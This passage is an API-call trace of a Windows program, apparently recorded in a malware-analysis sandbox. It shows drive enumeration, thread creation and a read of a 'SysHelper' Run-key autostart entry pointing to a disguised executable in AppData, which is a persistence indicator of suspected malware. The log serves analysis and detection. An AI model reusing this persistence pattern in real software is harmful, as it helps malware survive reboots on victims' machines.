lpParam=0x0) returned 0x1b0260 [0170.961] NtdllDefWindowProc_W () returned 0x0 [0170.961] NtdllDefWindowProc_W () returned 0x1 [0170.963] NtdllDefWindowProc_W () returned 0x0 [0171.738] NtdllDefWindowProc_W () returned 0x0 [0171.739] ShowWindow (hWnd=0x1b0260, nCmdShow=0) returned 0 [0171.739] UpdateWindow (hWnd=0x1b0260) returned 1 [0171.739] GetLogicalDrives () returned 0x4 [0171.739] SetErrorMode (uMode=0x1) returned 0x0 [0171.739] PathFileExistsA (pszPath="C:\\") returned 1 [0171.741] SetErrorMode (uMode=0x0) returned 0x1 [0171.741] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0171.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x806) returned 0x323db78 [0171.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d500, cbMultiByte=-1, lpWideCharStr=0x323db78, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0171.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x323e388 [0171.742] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x323db78 | out: hHeap=0x260000) returned 1 [0171.742] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x31839b8 [0171.749] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x323e388 | out: hHeap=0x260000) returned 1 [0171.749] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31839b8 | out: hHeap=0x260000) returned 1 [0171.749] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x31839b8 [0171.749] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x10) returned 0x3213d78 [0171.750] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x8ec) returned 0x323db78 [0171.750] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x323e470 [0171.750] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9aba4b8 [0171.750] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1070) returned 0x323ec88 [0171.750] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x31c0458 [0171.750] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x3238290 [0171.750] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x660) returned 0x3238aa8 [0171.750] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9acbf28 [0171.796] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9acc7b0 [0171.796] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9acd038 [0171.797] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9acd8c0 [0171.797] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ace148 [0171.797] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x840) returned 0x3239110 [0171.797] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ace9d0 [0171.797] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9acf258 [0171.797] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x840) returned 0x3239958 [0171.797] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x323a1a0 [0171.797] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x9adbf10 [0171.797] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9acfae0 [0171.797] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ad0368 [0171.797] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x840) returned 0x9adc778 [0171.797] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x840) returned 0x9adcfc0 [0171.798] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ad0bf0 [0171.798] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ad1478 [0171.798] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ad1d00 [0171.798] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ad2588 [0171.798] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ad2e10 [0171.798] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ad3698 [0171.798] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ad3f20 [0171.798] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ad47a8 [0171.798] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ad5030 [0171.798] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ad58b8 [0171.798] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x9add808 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x9ade070 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ad6140 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ad69c8 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ad7250 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x840) returned 0x9ade8d8 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x840) returned 0x9adf120 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ad7ad8 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ad8360 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ad8be8 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ad9470 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ad9cf8 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ada580 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9adae08 [0171.799] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9adf980 [0171.800] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ae0208 [0171.800] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x9aef968 [0171.801] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x9af01d0 [0171.801] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ae0a90 [0171.801] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ae1318 [0171.801] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ae1ba0 [0171.801] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x840) returned 0x9af0a38 [0171.801] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x840) returned 0x9ae2428 [0171.801] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ae2cb0 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ae3538 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ae3dc0 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ae4648 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ae4ed0 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ae5758 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ae5fe0 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ae6868 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ae70f0 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x9af1280 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x9af1ae8 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ae7978 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9ae8200 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ae8a88 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x840) returned 0x9ae9310 [0171.802] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9ae9b98 [0171.803] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9aea420 [0171.803] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9aeaca8 [0171.803] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9aeb530 [0171.803] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9aebdb8 [0171.803] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc0) returned 0x31ae208 [0171.803] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9aec640 [0171.803] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x9af2350 [0171.803] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x9aecec8 [0171.803] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x9aed750 [0171.803] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x9aedfd8 [0171.803] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x9aee860 [0171.803] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x9af2b80 [0171.804] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x9af3408 [0171.804] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x31c04c0 [0171.804] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9af3c90 [0171.804] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9af4518 [0171.804] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9af4da0 [0171.804] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x9af5628 [0171.804] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x110) returned 0x321e908 [0171.804] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x323db80, dwCreationFlags=0x0, lpThreadId=0x3213d80 | out: lpThreadId=0x3213d80*=0xb30) returned 0x694 [0171.806] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0xb2c) returned 0x698 [0171.807] GetMessageW (in: lpMsg=0x18d6f8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18d6f8) returned 1 [0183.765] NtdllDefWindowProc_W () returned 0x0 [0183.765] NtdllDefWindowProc_W () returned 0x0 [0183.792] NtdllDefWindowProc_W () returned 0x0 [0183.793] NtdllDefWindowProc_W () returned 0x0 [0183.793] NtdllDefWindowProc_W () returned 0x0 [0183.795] NtdllDefWindowProc_W () returned 0x0 [0183.795] NtdllDefWindowProc_W () returned 0x0 [0183.795] NtdllDefWindowProc_W () returned 0x1 [0183.798] NtdllDefWindowProc_W () returned 0x0 [0185.484] NtdllDefWindowProc_W () returned 0x0 [0185.486] NtdllDefWindowProc_W () returned 0x0 [0185.486] NtdllDefWindowProc_W () returned 0x0 [0185.486] NtdllDefWindowProc_W () returned 0x3 [0185.487] TranslateMessage (lpMsg=0x18d6f8) returned 0 [0185.487] DispatchMessageW (lpMsg=0x18d6f8) returned 0x0 [0185.487] GetMessageW (in: lpMsg=0x18d6f8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18d6f8) returned 0 [0185.487] NtdllDefWindowProc_W () returned 0x2 [0185.488] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18be10 | out: phkResult=0x18be10*=0x6f0) returned 0x0 [0185.488] RegQueryValueExW (in: hKey=0x6f0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18be0c, lpData=0x18a538, lpcbData=0x18bdf0*=0x400 | out: lpType=0x18be0c*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --AutoStart", lpcbData=0x18bdf0*=0x14c) returned 0x0 [0185.488] RegCloseKey (hKey=0x6f0) returned 0x0 [0185.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x150) returned 0x348e48 [0185.488] lstrlenA (lpString="\" --AutoStart") returned 13 [0185.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x323aa08 [0185.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x348e48 | out: hHeap=0x260000) returned 1 [0185.488] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned 1 [0185.489] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x323aa08 | out: hHeap=0x260000) returned 1 [0185.489] IsWindow (hWnd=0x1b0260) returned 1 [0185.489] DestroyWindow (hWnd=0x1b0260) returned 1 [0185.489] NtdllDefWindowProc_W () returned 0x0 [0185.490] NtdllDefWindowProc_W () returned 0x1 [0185.491] NtdllDefWindowProc_W () returned 0x0 [0185.491] NtdllDefWindowProc_W () returned 0x0 [0185.492] NtdllDefWindowProc_W () returned 0x0 [0185.492] NtdllDefWindowProc_W () returned 0x0 [0185.492] NtdllDefWindowProc_W () returned 0x0 [0185.492] PostQuitMessage (nExitCode=0) [0185.501] NtdllDefWindowProc_W () returned 0x0 [0185.502] CloseHandle (hObject=0x5ec) returned 1 [0185.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31839b8 | out: hHeap=0x260000) returned 1 [0185.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bd60 | out: hHeap=0x260000) returned 1 [0185.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bd88 | out: hHeap=0x260000) returned 1 [0185.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bdb0 | out: hHeap=0x260000) returned 1 [0185.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bdd8 | out: hHeap=0x260000) returned 1 [0185.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321be00 | out: hHeap=0x260000) returned 1 [0185.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321be28 | out: hHeap=0x260000) returned 1 [0185.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f8578 | out: hHeap=0x260000) returned 1 [0185.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f85b0 | out: hHeap=0x260000) returned 1 [0185.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321be50 | out: hHeap=0x260000) returned 1 [0185.502] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321be78 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bea0 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bec8 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bef0 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bf18 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bf40 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f85e8 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f8620 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bf68 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bf90 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bfb8 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321bfe0 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c008 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c030 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c058 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c080 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f8658 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f8690 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c0a8 | out: hHeap=0x260000) returned 1 [0185.503] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c0d0 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c0f8 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c120 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c148 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c170 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c198 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c1c0 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f86c8 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f8700 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c1e8 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c210 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c238 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c260 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c288 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3237198 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b8590 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3204bc0 | out: hHeap=0x260000) returned 1 [0185.504] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x28ec00 | out: hHeap=0x260000) returned 1 [0185.505] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2b24b0 | out: hHeap=0x260000) returned 1 [0185.505] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x318f448 | out: hHeap=0x260000) returned 1 [0185.506] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3220fd0 | out: hHeap=0x260000) returned 1 [0185.506] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac1b8 | out: hHeap=0x260000) returned 1 [0185.506] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac320 | out: hHeap=0x260000) returned 1 [0185.506] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac5a8 | out: hHeap=0x260000) returned 1 [0185.506] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3227168 | out: hHeap=0x260000) returned 1 [0185.506] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2b1b00 | out: hHeap=0x260000) returned 1 [0185.506] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3213d78 | out: hHeap=0x260000) returned 1 [0185.506] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27e9d8 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3194750 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ab8298 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ab8b20 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ab93a8 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ab9c30 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31c03f0 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ab7188 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3237a70 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa0048 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac2130 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac9598 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9acb6f8 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x323d360 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x323cb48 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x349eb0 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa0870 | out: hHeap=0x260000) returned 1 [0185.507] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa18d0 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa2108 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa2940 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa3178 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa41f0 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa39b0 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa1098 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa5280 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa6b70 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa77f0 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa4a38 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa8470 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa6308 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa94e0 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa8c98 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa9d28 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aaa560 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aa5ac8 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aaad98 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9abb5c0 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9abc618 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9abd688 | out: hHeap=0x260000) returned 1 [0185.508] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9abbde8 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aab5d8 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9abef68 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9abfbe8 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aac6e8 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aacf70 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9abdec0 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac0868 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac10b0 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9abce50 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9abe6f8 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9ac18f8 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aabe60 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aae080 | out: hHeap=0x260000) returned 1 [0185.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9aae908 | out: hHeap=0x260000) returned 1 